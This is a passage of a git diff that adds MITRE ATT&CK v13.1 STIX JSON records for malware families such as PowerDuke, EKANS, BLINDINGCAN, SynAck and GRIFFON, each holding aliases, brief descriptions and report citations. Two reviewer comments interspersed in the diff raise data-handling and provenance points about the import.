"2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0266", + "external_id": "S0266" + }, + { + "source_name": "TrickBot", + "description": "(Citation: S2 Grupo TrickBot June 2017) (Citation: Trend Micro Totbrick Oct 2016) (Citation: TrendMicro Trickbot Feb 2019)" + }, + { + "source_name": "TSPY_TRICKLOAD", + "description": "(Citation: Trend Micro Totbrick Oct 2016)" + }, + { + "source_name": "Totbrick", + "description": "(Citation: Trend Micro 
Totbrick Oct 2016) (Citation: Microsoft Totbrick Oct 2017)" + }, + { + "source_name": "Trend Micro Totbrick Oct 2016", + "description": "Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n" + }, + { + "source_name": "IBM TrickBot Nov 2016", + "description": "Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot\u2019s Machinations. Retrieved August 2, 2018.", + "url": "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/" + }, + { + "source_name": "TrendMicro Trickbot Feb 2019", + "description": "Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/" + }, + { + "source_name": "CrowdStrike Wizard Spider October 2020", + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.", + "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/" + }, + { + "source_name": "Microsoft Totbrick Oct 2017", + "description": "Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick" + }, + { + "source_name": "Fidelis TrickBot Oct 2016", + "description": "Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.", + "url": "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre" + }, + { + "source_name": "S2 Grupo TrickBot June 2017", + "description": "Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. 
Retrieved July 31, 2018.", + "url": "https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a.json new file mode 100644 index 0000000000000000000000000000000000000000..d347b72b5973a7e1a1e190b31c597103ac9f6490 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--46c92d4d-8003-4878-950a-c5f613f9c7ef", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "PowerDuke" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--00c3bfcb-99bd-4767-8c03-b08f585f5c8a", + "type": "malware", + "created": "2017-05-31T21:33:19.746Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0139", + "external_id": "S0139" + }, + { + "source_name": "PowerDuke", + "description": "(Citation: Volexity PowerDuke November 2016)" + }, + { + "source_name": "Volexity PowerDuke November 2016", + "description": "Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.", + "url": "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + } + ], + "modified": "2020-03-30T17:22:08.256Z", + "name": "PowerDuke", + "description": "[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
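Review bot: This object is written at `x_mitre_attack_spec_version` 2.1.0 and has no `revoked` or `x_mitre_deprecated` keys, whereas the 3.1.0-spec objects in the neighbouring bundles (EKANS, RCSession) spell both out as `false`. Any loader that filters the corpus with `obj["revoked"]` or `obj["x_mitre_deprecated"]` will raise on, or silently drop, every 2.1.0-era object such as this one; it should read them as `obj.get("revoked", False)` and `obj.get("x_mitre_deprecated", False)`. Because these files appear to be a vendored upstream export that should not be hand-edited, I would record the absent-means-false rule in a README beside the `cti-ATT-CK-v13.1` tree rather than patching the JSON.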
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json new file mode 100644 index 0000000000000000000000000000000000000000..8c809cd80dfa6b0ad2a066bcaa19a2bf6eb60da1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5.json 
@@ -0,0 +1,68 @@ +{ + "type": "bundle", + "id": "bundle--4e399473-3c95-4843-96cc-0a9e7e44c333", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:04:48.834Z", + "name": "EKANS", + "description": "[EKANS](https://attack.mitre.org/software/S0605) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://attack.mitre.org/software/S0605) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://attack.mitre.org/software/S0576).(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "type": "malware", + "id": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "created": "2021-02-12T20:07:42.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0605", + "external_id": "S0605" + }, + { + "source_name": "EKANS", + "description": "(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "SNAKEHOSE", + "description": "(Citation: FireEye Ransomware Feb 2020)" + }, + { + "source_name": "Dragos EKANS", + "description": "Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. 
Retrieved February 9, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "Palo Alto Unit 42 EKANS", + "description": "Hinchliffe, A. Santos, D. (2020, June 26). Threat Assessment: EKANS Ransomware. Retrieved February 9, 2021.", + "url": "https://unit42.paloaltonetworks.com/threat-assessment-ekans-ransomware/" + }, + { + "source_name": "FireEye Ransomware Feb 2020", + "description": "Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725.json new file mode 100644 index 0000000000000000000000000000000000000000..b675449ef32be91db2638acc5608f36d2bdf83e9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--fef426e1-3c0a-4f21-99a1-e3b145c42826", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_aliases": [ + "BLINDINGCAN" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--01dbc71d-0ee8-420d-abb4-3dfb6a4bf725", + "type": "malware", + "created": "2020-10-27T18:45:58.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0520", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0520" + }, + { + "source_name": "US-CERT BLINDINGCAN Aug 2020", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", + "description": "US-CERT. (2020, August 19). MAR-10295134-1.v1 \u2013 North Korean Remote Access Trojan: BLINDINGCAN. Retrieved August 19, 2020." + }, + { + "source_name": "NHS UK BLINDINGCAN Aug 2020", + "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3603", + "description": "NHS Digital . (2020, August 20). BLINDINGCAN Remote Access Trojan. Retrieved August 20, 2020." + } + ], + "modified": "2021-03-17T15:55:56.257Z", + "name": "BLINDINGCAN", + "description": "[BLINDINGCAN](https://attack.mitre.org/software/S0520) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
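Review bot: The bundles added here are an unsigned, generated copy of MITRE's STIX export, and nothing in the diff records where they came from; the directory name suggests the `ATT&CK-v13.1` release of `mitre/cti`, but no upstream commit or checksum is pinned, so a consumer cannot later verify that this object matches what MITRE published. I would add a short provenance file beside the tree stating the upstream repository, tag or commit, retrieval date and a SHA-256 per bundle file, so the dataset can be re-verified or refreshed deterministically. Every object here references `marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168`; if that marking-definition object and the upstream licence/attribution text are not part of this import, include them so the ATT&CK terms of use travel with the data.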
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--039814a0-88de-46c5-a4fb-b293db21880a.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--039814a0-88de-46c5-a4fb-b293db21880a.json new file mode 100644 index 0000000000000000000000000000000000000000..4d98dfd48b99c48afc61c045fff4b5249a437790 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--039814a0-88de-46c5-a4fb-b293db21880a.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--eee33094-2bb0-4d5d-9a0e-f555d84e269c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Wiarp" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--039814a0-88de-46c5-a4fb-b293db21880a", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0206", + "external_id": "S0206" + }, + { + "source_name": "Wiarp", + "description": "(Citation: Symantec Wiarp May 2012)" + }, + { + "url": "https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf", + "description": "O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.", + "source_name": "Symantec Elderwood Sept 2012" + }, + { + "source_name": "Symantec Wiarp May 2012", + "description": "Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.", + "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99" + } + ], + "modified": "2021-01-06T19:32:28.378Z", + "name": "Wiarp", + "description": "[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03acae53-9b98-46f6-b204-16b930839055.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03acae53-9b98-46f6-b204-16b930839055.json new file mode 100644 index 0000000000000000000000000000000000000000..b727fc1a19199fd26d8597b800ccdb5564d2a6b7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03acae53-9b98-46f6-b204-16b930839055.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--4201fcc3-a37a-47e6-9429-cf75e7087038", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T19:54:58.293Z", + "name": "RCSession", + "description": "[RCSession](https://attack.mitre.org/software/S0662) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://attack.mitre.org/groups/G0129) and by [Threat Group-3390](https://attack.mitre.org/groups/G0027) (Type II Backdoor).(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "RCSession" + ], + "type": "malware", + "id": "malware--03acae53-9b98-46f6-b204-16b930839055", + "created": "2021-11-19T19:47:26.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0662", + "external_id": "S0662" + }, + { + "source_name": "Secureworks BRONZE PRESIDENT December 2019", + "description": "Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.", + "url": "https://www.secureworks.com/research/bronze-president-targets-ngos" + }, + { + "source_name": "Trend Micro Iron Tiger April 2021", + "description": "Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html" + }, + { + "source_name": "Trend Micro DRBControl February 2020", + "description": "Lunghi, D. et al. (2020, February). Uncovering DRBControl. 
Retrieved November 12, 2021.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4.json new file mode 100644 index 0000000000000000000000000000000000000000..24a407e62d053e8f1a1b36c63680ecef33679150 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--117e0d35-7701-4d4b-8730-681d64203a4a", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Spark" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4", + "type": "malware", + "created": "2020-12-15T01:30:05.198Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0543", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0543" + }, + { + "source_name": "Spark", + "description": "\n(Citation: Unit42 Molerat Mar 2020) " + }, + { + "source_name": "Unit42 Molerat Mar 2020", + "url": "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "description": "Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020." + } + ], + "modified": "2021-08-18T23:49:01.615Z", + "name": "Spark", + "description": "\n[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03eb4a05-6a02-43f6-afb7-3c7835501828.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03eb4a05-6a02-43f6-afb7-3c7835501828.json new file mode 100644 index 0000000000000000000000000000000000000000..591b20da101992cf715980799ec78224813a5d0e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--03eb4a05-6a02-43f6-afb7-3c7835501828.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--a0de5146-0aeb-4c8e-9b55-92bc6cd2385c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "QuietSieve" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--03eb4a05-6a02-43f6-afb7-3c7835501828", + "created": "2022-02-18T16:46:39.268Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0686", + "url": "https://attack.mitre.org/software/S0686" + }, + { + "source_name": "Microsoft Actinium February 2022", + "url": "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/", + "description": "Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)", + "modified": "2022-04-15T12:31:52.469Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "QuietSieve", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04227b24-7817-4de1-9050-b7b1b57f5866.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04227b24-7817-4de1-9050-b7b1b57f5866.json new file mode 100644 index 0000000000000000000000000000000000000000..dbe721306fc5b1b71a60717bfa281da2243c6b87 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04227b24-7817-4de1-9050-b7b1b57f5866.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--d049e860-d559-40ef-b1a1-d6d9176f18fe", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "SynAck" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--04227b24-7817-4de1-9050-b7b1b57f5866", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0242", + "external_id": "S0242" + }, + { + "source_name": "SynAck", + "description": "(Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)" + }, + { + "source_name": "SecureList SynAck Doppelg\u00e4nging May 2018", + "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.", + "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + }, + { + "source_name": "Kaspersky Lab SynAck May 2018", + "description": "Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelg\u00e4nging technique. Retrieved May 24, 2018.", + "url": "https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging" + } + ], + "modified": "2021-09-08T19:22:44.438Z", + "name": "SynAck", + "description": "[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. 
(Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)", + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--049ff071-0b3c-4712-95d2-d21c6aa54501.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--049ff071-0b3c-4712-95d2-d21c6aa54501.json new file mode 100644 index 0000000000000000000000000000000000000000..ae7b6e4413c719c5227526a2e8ca94aa56a3151d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--049ff071-0b3c-4712-95d2-d21c6aa54501.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--bbeb2145-73b4-4d32-b525-3fe39dcc04b0", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "MURKYTOP" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--049ff071-0b3c-4712-95d2-d21c6aa54501", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0233", + "external_id": "S0233" + }, + { + "source_name": "MURKYTOP", + "description": "(Citation: FireEye Periscope March 2018)" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "description": "FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.", + "source_name": "FireEye Periscope March 2018" + } + ], + "modified": "2020-03-30T17:00:19.828Z", + "name": "MURKYTOP", + "description": "[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04fc1842-f9e4-47cf-8cb8-5c61becad142.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04fc1842-f9e4-47cf-8cb8-5c61becad142.json new file mode 100644 index 0000000000000000000000000000000000000000..a209bd6ee87757b6092777d413d9ec28aaa7d35a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--04fc1842-f9e4-47cf-8cb8-5c61becad142.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--228ef21b-1f02-4230-bb76-fa3084887df7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "GRIFFON" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--04fc1842-f9e4-47cf-8cb8-5c61becad142", + "type": "malware", + "created": "2019-10-11T17:29:20.165Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0417", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0417" + }, + { + "description": "Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities. Retrieved October 11, 2019.", + "url": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", + "source_name": "SecureList Griffon May 2019" + } + ], + "modified": "2020-06-23T19:20:45.892Z", + "name": "GRIFFON", + "description": "[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--051eaca1-958f-4091-9e5f-a9acd8f820b5.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--051eaca1-958f-4091-9e5f-a9acd8f820b5.json new file mode 100644 index 0000000000000000000000000000000000000000..e2b19145589b14133fa7fdee8519a214d686dc19 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--051eaca1-958f-4091-9e5f-a9acd8f820b5.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--c549f32d-addd-455a-9d44-c477290f4b04", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T18:59:38.457Z", + "name": "Exaramel for Windows", + "description": "[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "2.2", + "x_mitre_aliases": [ + "Exaramel for Windows" + ], + "type": "malware", + "id": "malware--051eaca1-958f-4091-9e5f-a9acd8f820b5", + "created": "2019-01-30T15:10:03.894Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0343", + "external_id": "S0343" + }, + { + "source_name": "Exaramel for Windows", + "description": "(Citation: ESET TeleBots Oct 2018)" + }, + { + "source_name": "ESET TeleBots Oct 2018", + "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.", + "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 